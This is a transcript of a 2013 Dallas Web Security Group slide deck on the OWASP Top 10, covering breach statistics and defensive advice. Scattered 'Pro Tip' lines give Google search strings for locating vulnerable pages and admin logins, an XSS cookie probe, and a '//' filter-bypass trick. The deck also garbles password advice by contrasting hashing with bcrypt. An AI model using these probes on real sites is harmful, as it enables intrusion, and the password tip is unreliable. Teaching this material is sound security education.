Dallas Web Security Group - February Meeting - Addressing Top Security Threats

Credera is a full-service management and

technology consulting firm. Our clients range

from Fortune 1,000 companies to emerging

industry leaders. We provide expert, objective

advice to help solve complex business and

technology challenges.

Dallas Office15303 Dallas ParkwaySuite 300Addison, TX 75001

972.692.0010 Phone972.692.0019 Fax

Denver Office5445 DTC ParkwaySuite 1040Greenwood Village, CO 80111

303.623.1344 Phone303.484.4577 Fax

Houston Office800 Town & Country BlvdSuite 300Houston, TX 77024

713.496.0711 Phone713.401.9650 Fax

Austin Office9020 N Capital of Texas HwySuite 345Austin, TX 78759

512.327.1112 Phone512.233.0844 Fax

Discussion document – Strictly Confidential & Proprietary

Addressing Top Security Threats in Web ApplicationsDallas, TX

February 12, 2013

Dallas Web Security Group Inaugural Meeting

Dustin Talk

Josh Hamit

04/08/2023

Dallas Web Security Group

3

Agenda …

Welcome to the Dallas Web Security User Group, where we will discuss all things related to web security

• Introductions

• Expectations and Objectives

• Why is Security Important?

• What are Common Security Issues?

– The OWASP Top 10

• How Common are Security Vulnerabilities?

– 2012 Research Findings

• Looking at Some Examples

– SQL Injection (SQLi)

– Cross Site Scripting (XSS)

– A Real Life Example

• What Can I do?

• Q&A

04/08/2023


4

Introductions

04/08/2023


5

Dustin Talk and Josh Hamit (both not Anonymous)

Dustin TalkDustin Talk is an Architect with Credera in the eCommerce practice. He holds a B.S. and Masters degree in Computer Science from Texas A&M University. Dustin has several years experience in custom web application development with a focus on security, emerging technologies, and Spring/JPA Frameworks. During tenure with Credera, he has led and worked on various teams building applications in Java including supply chain optimization, large scale eCommerce implementations utilizing Broadleaf Commerce, and eCommerce conversion efforts.

Past Presentations:

• OWASP Top 10 - Live Exploits by Example• Stripe’s Capture The Flag #2• OAuth 1.0 / 2.0• OpenID

Josh HamitJoshua Hamit is a Consultant in the Custom Java Development Practice at Credera. He earned his B.B.A in Management Information Systems from Baylor University. Joshua has several years experience designing and implementing technology solutions utilizing a broad range of technologies while adhering to industry best practices. While at Credera, he has lead the design and implementation of multiple single sign-on authentication systems, enterprise integrations, complex UI solutions, analytic tracking pixels, and mobile web applications.

Past Presentations:

• Addressing Cross-Cutting Concerns with AOP• Functional Testing with Geb• Stripe’s Capture The Flag #2• Effective Front-End Design with SASS

Introductions…

04/08/2023


6

Expectations and Objectives

04/08/2023


7

The Organizational Goal is to equip you with knowledge that you may incorporate in your job, your next project, or just to have fun (not lulz)

Participant Expectations• Focus on DFW Area

• Provide Education to Seed Investigation

• Learn more about Software / Infrastructure / etc…

Expectations and Objectives …

04/08/2023


8

Why is Security Important?

04/08/2023


9

Not limited to business the web is a mans to showcase capabilities and engage with others providing hackers with a variety of attack vectors to be defended

The Importance of Security• Legal Risk: Many organizations are legally bound to protect privacy and security, this is often an

integral part of application development

– COPPA

– HIPPA

– Sarbanes-Oxley

– PCI Compliance

• Financial Risk: Computer security attacks cost $48 billion in 2011

– 2011 cost of individual data breach estimated to be $5.5 million

– Organized hacking groups may be more well funded than your IT department

• Reputation Risk: Trust is a key component to customer adoption and retention

– 20% of businesses that lost data, lost customers as a direct result

– The reputation impact of a single angry customer may be from 40-80 people

• Doxing: Living in a digital information age allows others to know more about you than ever before

– Expectation of privacy, when there may be none due to data leakage

– Can be used to encroach on physical security

Why is Security Important? …

*https://devcentral.f5.com/blogs/us/quantifying-reputation-loss-from-a-breachhttp://www.informationweek.com/security/attacks/data-breach-costs-drop/232602891http://www.druva.com/blog/2012/08/15/security-breaches-are-on-the-rise-but-preventable/

04/08/2023


10

With constant code deployments and a steady stream of exploits released the organizational importance placed on web security does not vary

The Importance of Security

Website security is a moving target. New attacks techniques are frequently disclosed. New website launches are common. New Web technologies are made available every day. New application code is released constantly. Enterprises need timely information about how they can best defend their websites, gain visibility into their vulnerability lifecycle, measure the performance of their security programs, and determine how they compare to their industry peers. Establishing these metrics is crucial towards improving enterprise security.

Why is Security Important? …

*Figure and statistics from June 2012 WhiteHat Security Statistics Report

04/08/2023


11

What are Common Security Issues?

04/08/2023


12

OWASP collects data from successful web application attacks to produce a list of the top 10 web attacks seen over the past year by security experts

#1 – Injection

What are Common Security Issues? …

*Data provided by the Open Web Application Security Project

Pro Tip: Let Google find these exploitable pages for you by searching for them (ex: “intext:SQL syntax & inurl:index.php?=id & inurl:edu”

04/08/2023


13


#2 – Cross Site Scripting (XSS)



Pro Tip: Use a cheat sheet when penetration testing for this (http://ha.ckers.org/xsscalc.html)

•Raw data from attacker is sent to an innocent user’s browser

Occurs any time…

•Stored in database•Reflected from web input (form field, hidden field, URL, etc…)•Sent directly into rich JavaScript client

Raw data…

•Try this in your browser – javascript:alert(document.cookie)

Virtually every web application has this problem

•Steal user’s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site

•Most Severe: Install XSS proxy which allows attacker to observe and direct all user’s behavior on vulnerable site and force user to other sites

Typical Impact

04/08/2023


14


#3 – Broken Authentication and Session Management



Pro Tip: Using tools like Cookie Cadger can quickly help check Session Management or hijacking issues

•Means credentials have to go with every request•Should use SSL for everything requiring authentication

HTTP is a “stateless” protocol

•SESSION ID used to track state since HTTP doesn’t•and it is just as good as credentials to an attacker

•SESSION ID is typically exposed on the network, in browser, in logs, …

Session management flaws

•Change my password, remember my password, forgot my password, secret question, logout, email address, etc…

Beware the side-doors

•User accounts compromised or user sessions hijacked

Typical Impact

04/08/2023


15


#4 – Insecure Direct Object References



Pro Tip: Using Google’s cache feature can tell hackers how a page’s form used to appear on a site

• This is part of enforcing proper “Authorization”, along with A7 – Failure to Restrict URL Access

How do you protect access to your data?

• Only listing the ‘authorized’ objects for the current user, or• Hiding the object references in hidden fields• … and then not enforcing these restrictions on the server side• This is called presentation layer access control, and doesn’t work• Attacker simply tampers with parameter value

A common mistake …

• Users are able to access unauthorized files or data

Typical Impact

04/08/2023


16


#5 – Cross Site Request Forgery (CSRF)



Pro Tip: HTML Image Tags can be easily used for CSRF as the ‘src’ element can be any HTTP location and does not have to be an image

• An attack where the victim’s browser is tricked into issuing a command to a vulnerable web application

• Vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, …) with each request

Cross Site Request Forgery

• What if a hacker could steer your mouse and get you to click on links in your online banking application?

• What could they make you do?

Imagine…

• Initiate transactions (transfer funds, logout user, close account)• Access sensitive data• Change account details

Typical Impact

04/08/2023


17


#6 – Security Misconfiguration



Pro Tip: The Metasploit Framework provides a vast repository of tests for security misconfigurations

04/08/2023


18


#7 – Insecure Cryptographic Storage



Pro Tip: Never hash passwords, use bcyrpt. In 3 days on old hardware we are able to reverse over 300,000 complex hashed passwords

• Failure to identify all sensitive data• Failure to identify all the places that this sensitive data gets stored• Databases, files, directories, log files, backups, etc.

• Failure to properly protect this data in every location

Storing sensitive data insecurely

• Attackers access or modify confidential or private information• e.g, credit cards, health care records, financial data (yours or your customers)

• Attackers extract secrets to use in additional attacks• Company embarrassment, customer dissatisfaction, and loss of trust• Expense of cleaning up the incident, such as forensics, sending apology letters,

reissuing thousands of credit cards, providing identity theft insurance• Business gets sued and/or fined

Typical Impact

04/08/2023


19


#8 – Avoiding URL Access Control Flaws



Pro Tip: Using Google you can quickly find admin login url’s (ex: search for “inurl:admin/login.php”)

•Restrict access to authenticated users (if not public)•Enforce any user or role based permissions (if private)•Completely disallow requests to unauthorized page types (e.g., config files, log files, source files, etc.)

For each URL, a site needs to do 3 things

•Use a simple, positive model at every layer•Be sure you actually have a mechanism at every layer

Verify your architecture

•Forget automated analysis approaches•Verify that each URL in your application is protected by either•An external filter, like Java EE web.xml or a commercial product•Or internal checks in YOUR code – Use ESAPI’s isAuthorizedForURL() method

•Verify the server configuration disallows requests to unauthorized file types•Use WebScarab or your browser to forge unauthorized requests

Verify the implementation

04/08/2023


20


#9 – Insufficient Transport Layer Protection



Pro Tip: While most servers attempt to promote a TLS connection, they will usually still accept a less secure SSL 2.0 connection

• Failure to identify all sensitive data• Failure to identify all the places that this sensitive data is sent

• On the web, to backend databases, to business partners, internal communications• Failure to properly protect this data in every location

Transmitting sensitive data insecurely

• Attackers access or modify confidential or private information• e.g, credit cards, health care records, financial data (yours or your customers)

• Attackers extract secrets to use in additional attacks• Company embarrassment, customer dissatisfaction, and loss of trust• Expense of cleaning up the incident• Business gets sued and/or fined

Typical Impact

04/08/2023


21


#10 – Unvalidated Redirects and Forwards



Pro Tip: Most firewalls attempt to prevent this by blocking the text “http://” in URLs, however using just “//” works in most browsers

• And frequently include user supplied parameters in the destination URL• If they aren’t validated, attacker can send victim to a site of their choice

Web application redirects are very common

• They internally send the request to a new page in the same application• Sometimes parameters define the target page• If not validated, attacker may be able to use unvalidated forward to bypass

authentication or authorization checks

Forwards (aka Transfer in .NET) are common too

• Redirect victim to phishing or malware site• Attacker’s request is forwarded past security checks, allowing unauthorized function or

data access

Typical Impact

04/08/2023


22

How Common are Security Vulnerabilities?

04/08/2023


23

The reality of Web Application Security is that while total number of vulnerabilities are decreasing we are not out of the woods yet

Vulnerabilities are Decreasing• Web Application Firewall

Adoption has improved to mitigate 71% of vulnerabilities

• Remediation Rates are increasing, fixed 38 days or faster in 2011

• Reduced Window of Exposure, from 233 days to 231 days

• Scope of scans increased to include Energy and Non-Profit

Dallas, TX is Vulnerable• Texas is the nations second

largest Cyberstate• 456,500 High Tech Jobs

How Common are Security Vulnerabilities? …

*Figure and statistics from June 2012 WhiteHat Security Statistics Reporthttp://www.druva.com/blog/2012/08/15/security-breaches-are-on-the-rise-but-preventable/http://www.techamericafoundation.org/cyberstates2011-texas

04/08/2023


24

Despite the overall improvement of security vulnerabilities, the past year has been rough with millions of accounts exposed to hackers from the biggest sites

A year in Security Breaches


*Figure and statistics from Dashlane / Harris Interactive

04/08/2023


25

Despite a reduction in the number of vulnerabilities discovered on average, the possibility of a serious vulnerability remains high

Serious Vulnerabilities• 55% of websites contain Cross Site Scripting Vulnerabilities• Over half of websites expose sensitive data, useful to intruders• More than 1/3 of websites allow for content spoofing (used in phishing or brand attacks)



04/08/2023


26

Breaking down the data by industry accredits widely held beliefs about some industries but exposes others

Industries Compared• Banking and Healthcare rank lower • Education in the middle• Retail and Insurance are the most exposed• IT is number three?

A High Standard Deviation• Companies typically get it and invest in it, or

they don’t



04/08/2023


27

The time of exposure is directly related to the developer and executive support for information and application security

Window of Exposure• Vulnerabilities can and will happen to every company• Significantly reduced risk is possible with organizational focus



04/08/2023


28

The time to fix vulnerabilities may be inhibited by the complexity of an organization but the true time to fix involves a sense of Risk Management

Average Time to Fix Vulnerabilities• 50% of Organizations required 38 days or less to remediate their serious vulnerabilities



04/08/2023


29

Vulnerability remediation can take many forms and fixes performed at only one level leave an opportunity for the issue to re-appear

Vulnerability Reopen Rates

The higher severity that a vulnerability has, the higher the likelihood that the vulnerability will reopen. Urgent: 23%, Critical: 22%, High: 15%.



04/08/2023


30

A Look at Some Examples(DEMO)

04/08/2023


31

A Look at Some Examples …

Anyone can setup an exploit in a sandboxed environment, but these are real vulnerabilities live and in the wild

A simple cross site scripting attack

04/08/2023


32

What Can I Do?

04/08/2023


33

What Can I do? …

Attend More Meetings…

What To Do Now• Develop Secure Code using Industry Best Practices• Review you Applications using an External Team

What Not To Do• With the rate of attacks, don’t attract unwanted attention

– http://www.youtube.com/watch?feature=player_detailpage&v=5gPt8HYMO7Q#t=69s

Reference Materials• The Open Web Application Security Project

– https://www.owasp.org/

http://www.youtube.com/watch?feature=player_detailpage&v=5gPt8HYMO7Q%23t=69s

04/08/2023


34

Q&A

Dallas Web Security Group - February Meeting - Addressing Top Security Threats

Documents

Transcript of Dallas Web Security Group - February Meeting - Addressing Top Security Threats